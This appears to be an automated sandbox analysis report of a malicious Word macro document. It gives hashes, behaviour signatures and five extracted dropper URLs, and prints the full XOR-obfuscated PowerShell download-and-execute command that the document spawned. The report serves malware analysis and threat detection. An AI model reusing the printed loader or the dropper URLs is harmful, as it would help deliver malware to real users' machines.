Analysis

  • max time kernel
    117s
  • max time network
    124s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    01-02-2022 05:39

General

  • Target

    7694066b23ea826ba0367777fe1f3e1b479a7fe3bac84adab2ae30f171ac1d5d.doc

  • Size

    210KB

  • MD5

    7a0e78ce8cccb72e9c39910df15490ba

  • SHA1

    5c26eb1856e7c814370476a900148da49d79a9e1

  • SHA256

    7694066b23ea826ba0367777fe1f3e1b479a7fe3bac84adab2ae30f171ac1d5d

  • SHA512

    114baa574bb3302007ba407ad78e448b7ca7d3ca557c0cafd532919134988b23f81bbc94b4d308990637d65242f4a8abfb9b333f23e389f8f73dcd45144c1940

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://giftmaster.ml/PSf4hk96K/

exe.dropper

http://mapup.net/w2u4kwT/

exe.dropper

http://www.survivallives.com/WdnX2iVg/

exe.dropper

http://modivi.hu/nxmoQ9pDQm/

exe.dropper

http://eroscenter.co.il/v5nFBp/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\7694066b23ea826ba0367777fe1f3e1b479a7fe3bac84adab2ae30f171ac1d5d.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1220
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowersHell.exe
      PowersHell . ( $ENV:COmspec[4,24,25]-Join'')([StrIng]::JOIN( '',('116x39Z49I25<109H62x53W39x125u63<50I58H53u51u36Z112W30V53H36I126<7Z53Z50<19!60V57H53I62W36Z107I116!3!57u38@109I119@56<36W36@32@106u127H127!55u57V54!36H61H49W35u36Z53@34!126V61V60u127I0I3x54x100W56I59I105@102u27Z127I16W56W36<36Z32!106V127W127H61!49!32V37<32W126@62W53u36I127!39@98<37I100u59!39<4@127W16Z56!36<36Z32H106W127u127V39<39I39Z126x35W37I34H38Z57<38H49I60@60W57V38x53@35I126I51Z63<61Z127W7!52I62<8x98<57@6x55@127<16Z56@36@36H32H106V127I127Z61x63V52x57x38Z57@126@56@37V127!62!40Z61x63Z1!105!32@20V1I61!127x16I56H36I36I32!106!127x127H53x34H63<35I51@53Z62W36I53W34@126u51I63@126!57@60H127Z38H101!62u22!18V32x127Z119H126@3V32@60!57W36H120u119Z16V119W121u107W116x42x62u29H112!109!112<119W101u103@97W119I107W116x25x27W63Z109x116!53@62@38x106@36W53W61Z32u123V119@12H119W123V116Z42u62<29I123V119u126@53H40W53Z119x107V54V63W34H53H49W51!56H120Z116<42I50u63H112@57u62!112V116I3@57H38W121W43V36V34W41Z43H116I39@49W25!126W20<63x39u62I60H63H49x52V22u57@60Z53I120u116!42H50H63I124Z112Z116Z25x27Z63<121<107@3x36@49u34@36@125@0<34x63@51<53x35I35x112V116W25u27Z63W107@50<34V53!49<59I107!45V51I49!36I51<56<43!45x45' -SpliT'V' -spLit'w'-SPlit'I' -spliT'!'-SPLIt'u' -spLIT '@'-sPlIT'x'-spliT'H' -SPlIt'<' -sPlIT 'Z' |foREAcH-OBJECt{ [chAr] ($_ -bxoR '0x50')}) ) )
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:912
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1240

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/912-81-0x0000000002410000-0x000000000305A000-memory.dmp
      Filesize

      12.3MB

    • memory/912-82-0x0000000004AB0000-0x0000000004FE6000-memory.dmp
      Filesize

      5.2MB

    • memory/1220-66-0x0000000000580000-0x000000000061A000-memory.dmp
      Filesize

      616KB

    • memory/1220-65-0x0000000000580000-0x000000000061A000-memory.dmp
      Filesize

      616KB

    • memory/1220-58-0x0000000000580000-0x000000000061A000-memory.dmp
      Filesize

      616KB

    • memory/1220-59-0x0000000000580000-0x000000000061A000-memory.dmp
      Filesize

      616KB

    • memory/1220-61-0x0000000000580000-0x000000000061A000-memory.dmp
      Filesize

      616KB

    • memory/1220-60-0x0000000000580000-0x000000000061A000-memory.dmp
      Filesize

      616KB

    • memory/1220-62-0x0000000000580000-0x000000000061A000-memory.dmp
      Filesize

      616KB

    • memory/1220-64-0x0000000000580000-0x000000000061A000-memory.dmp
      Filesize

      616KB

    • memory/1220-54-0x00000000720A1000-0x00000000720A4000-memory.dmp
      Filesize

      12KB

    • memory/1220-57-0x0000000075AB1000-0x0000000075AB3000-memory.dmp
      Filesize

      8KB

    • memory/1220-70-0x0000000000580000-0x000000000061A000-memory.dmp
      Filesize

      616KB

    • memory/1220-74-0x0000000000580000-0x000000000061A000-memory.dmp
      Filesize

      616KB

    • memory/1220-76-0x0000000000580000-0x000000000061A000-memory.dmp
      Filesize

      616KB

    • memory/1220-75-0x0000000000580000-0x000000000061A000-memory.dmp
      Filesize

      616KB

    • memory/1220-77-0x0000000000580000-0x000000000061A000-memory.dmp
      Filesize

      616KB

    • memory/1220-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1220-55-0x000000006FB21000-0x000000006FB23000-memory.dmp
      Filesize

      8KB

    • memory/1220-84-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1240-83-0x000007FEFB5B1000-0x000007FEFB5B3000-memory.dmp
      Filesize

      8KB